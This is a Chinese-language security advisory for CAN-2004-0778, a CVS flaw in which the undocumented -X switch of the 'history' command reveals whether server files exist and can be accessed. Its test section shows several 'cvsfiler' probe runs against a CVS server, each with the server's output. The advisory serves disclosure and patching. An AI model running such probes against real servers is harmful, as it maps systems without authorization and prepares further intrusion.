| 信息提供: |
安全公告(或线索)提供热线:51cto.editor@gmail.com |
| 漏洞类别: |
未文档化标记信息泄露漏洞 |
| 攻击类型: |
远程攻击 |
| 发布日期: |
2004-08-16 |
| 更新日期: |
2004-08-18 |
| 受影响系统: |
CVS CVS 1.12.8
CVS CVS 1.12.7
CVS CVS 1.12.2
CVS CVS 1.12.1
CVS CVS 1.11.6
CVS CVS 1.11.5
CVS CVS 1.11.4
CVS CVS 1.11.3
CVS CVS 1.11.2
CVS CVS 1.11.1p1
CVS CVS 1.11.16
CVS CVS 1.11.15
CVS CVS 1.11.14
CVS CVS 1.11.11
CVS CVS 1.11.10
CVS CVS 1.11 |
| 安全系统: |
CVS
CVS 1.12.9
CVS CVS 1.11.17 |
| 漏洞报告人: |
iDEFENSE Security Advisory |
| 漏洞描述: |
BUGTRAQ ID:
10955
CVE(CAN) ID:
CAN-2004-0778
Concurrent Versions System (CVS)是一款开放源代码的版本控制软件。
CVS存在未文档化命令参数开关标记,远程攻击者可以利用这个漏洞获得敏感信息。
问题存在于src/history.c文件中的'history'命令的未公开开关,-X命令选项指定历史文件名,允许攻击者判断任意系统文件或目录是否存在,或者CVS进程是否能访问它们。可导致敏感信息泄露。 |
| 测试方法: |
警告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
判断/etc/shells是否存在及CVS是否可访问:
$ ./cvsfiler 172.16.60.200 2401 cvs cvspass /var/cvs /etc/shells Connected
to server. E cvs server: warning: history
line 1 invalid E cvs server: warning:
history line 2 invalid ... E
cvs server: warning: history line 7 invalid M
No records selected. ok
判断/usr/bin/password是否存在及CVS是否可访问:
$ ./cvsfiler 172.16.60.200 2401 cvs cvspass /var/cvs /usr/bin/passwd Connected
to server. E cvs [server aborted]:
cannot open history file: /usr/bin/passwd: Permission
denied error
The file /etc/foo does not exist.
$ ./cvsfiler 172.16.60.200 2401 cvs cvspass /var/cvs /etc/foo
\ Connected
to server. E cvs [server aborted]:
cannot open history file: /etc/foo: No \ such
file or directory error
/tmp is a directory.
$ ./cvsfiler 172.16.60.200 2401 cvs cvspass /var/cvs /tmp Connected
to server. E cvs [server aborted]:
error reading history file: Is a directory error
|
| 解决方法: |
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载CVS
1.11.17 & 1.12.9版本:
http://www.cvshome.org/ |
